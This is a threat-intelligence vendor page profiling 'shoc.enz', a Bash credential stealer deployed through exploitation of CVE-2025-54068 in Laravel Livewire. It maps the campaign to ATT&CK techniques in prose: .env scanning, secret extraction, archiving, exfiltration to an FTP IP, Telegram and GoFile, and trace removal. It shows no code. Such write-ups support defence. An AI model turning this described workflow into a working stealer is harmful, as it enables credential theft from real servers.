Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareExploits 1 CVE

shoc.enz

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES
CVE-2025-54068Unauthenticated RCE in Laravel Livewire v3 HydrationExploited in the wild

Security researchers at Imperva first observed the activity on May 24, 2026, when their Cloud Web Application Firewall blocked suspicious deserialization attacks that were later linked to active exploitation of CVE-2025-54068. The vulnerability affects Laravel Livewire v3 versions up to 3.6.3 and stems from improper validation during the framework’s hydration process. | This script, identified as “shoc.enz,” is a credential-harvesting tool designed to locate and extract sensitive configuration data from Laravel environments.

via cyber security newscybersecuritynews.com
MITRE ATT&CK

Techniques & procedures

15 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1190Exploit Public-Facing ApplicationEvidence1

Initial Access: CVE-2025-54068 Exploitation ... An unauthenticated attacker can inject a malicious serialized PHP object into this request, triggering arbitrary code execution on deserialization.

Execution

1 technique
T1059.004Unix ShellEvidence2

Analysis of captured attack traffic shows that attackers leveraged PHPGGC gadget chains to construct payloads that execute remote shell commands. In observed cases, compromised systems were instructed to download a malicious Bash script from a command-and-control server and execute it silently in the background.

Stealth

3 techniques
T1036MasqueradingEvidence1

MITRE ATT&CK Mapping ... T1036 Masquerading Randomized archive and staging folder names

T1070Indicator RemovalEvidence1

To evade detection, the script removes traces of its activity after execution.

T1070.004File DeletionEvidence1

Cleanup : Deletes the local staging directory to remove forensic evidence

Credential Access

2 techniques
T1552.001Credentials In FilesEvidence1

Credential Extraction : Parses discovered files for DB_HOST, DB_DATABASE, DB_USERNAME, DB_PASSWORD, and APP_KEY values

T1555Credentials from Password StoresEvidence1

Once deployed, the malware scans the entire file system for .env files, which store critical application secrets such as database credentials, API keys, and encryption values. It extracts key fields including database hostnames, usernames, passwords, and application keys

Discovery

1 technique
T1083File and Directory DiscoveryEvidence1

File Discovery : Recursively scans the entire filesystem for .env files using the find command

Collection

2 techniques
T1560Archive Collected DataEvidence1

It extracts key fields including database hostnames, usernames, passwords, and application keys, then stages and compresses the data before exfiltrating it through multiple channels.

T1560.001Archive via UtilityEvidence1

Compression : Archives collected files using zip or tar.gz

Command and Control

1 technique
T1105Ingress Tool TransferEvidence2

compromised systems were instructed to download a malicious Bash script from a command-and-control server and execute it silently in the background. This script, identified as “shoc.enz,” is a credential-harvesting tool

Exfiltration

4 techniques
T1041Exfiltration Over C2 ChannelEvidence1

The threat actor operates a redundant three-channel exfiltration system ... Secondary api.telegram.org Notifications and small file uploads ... MITRE ATT&CK Mapping ... T1041 Exfiltration Over C2 Channel Telegram Bot API exfiltration

T1048Exfiltration Over Alternative ProtocolEvidence1

attackers used a multi-channel exfiltration setup involving an FTP server, the Telegram API, and the cloud storage platform GoFile.

T1048.003Exfiltration Over Unencrypted Non-C2 ProtocolEvidence1

The threat actor operates a redundant three-channel exfiltration system: Channel Endpoint Purpose Primary FTP @ 47.129.100.149:21 Main credential storage ... MITRE ATT&CK Mapping ... T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol FTP exfiltration to 47.129.100.149

T1567.002Exfiltration to Cloud StorageEvidence1

The threat actor operates a redundant three-channel exfiltration system ... Tertiary upload.gofile.io Backup cloud storage ... MITRE ATT&CK Mapping ... T1567.002 Exfiltration to Cloud Storage GoFile uploads

INDICATORS OF COMPROMISE

IOCs tracked for this family

8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
5 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
2 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app1 day ago
domain●●●●●●●●●●●●View more in app1 day ago
domain●●●●●●●●●●●●View more in app1 day ago
domain●●●●●●●●●●●●View more in app1 day ago
hash.sha256●●●●●●●●●●●●View more in app1 day ago
ip.v4●●●●●●●●●●●●View more in app1 day ago
ACTIVITY FEED

Recent activity

2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

2 SOURCESView more in app
cyber security newsNews
Jun 24, 2026
Laravel Livewire Applications Compromised to Steal Credentials Exploiting RCE Vulnerability

A malicious Bash script used after exploitation of Laravel Livewire to scan for .env files, extract sensitive configuration data such as database credentials, API keys, and application secrets, compress the stolen data, and exfiltrate it via FTP, Telegram API, and GoFile while removing traces of execution.

Read more
imperva blogNews
Jun 23, 2026
CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised | Imperva

A Bash-based credential stealer that scans compromised Laravel servers for .env files, extracts database and application secrets such as DB credentials and APP_KEY values, stages and compresses the data, and exfiltrates it via FTP, Telegram, and GoFile.

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching8

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping15

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.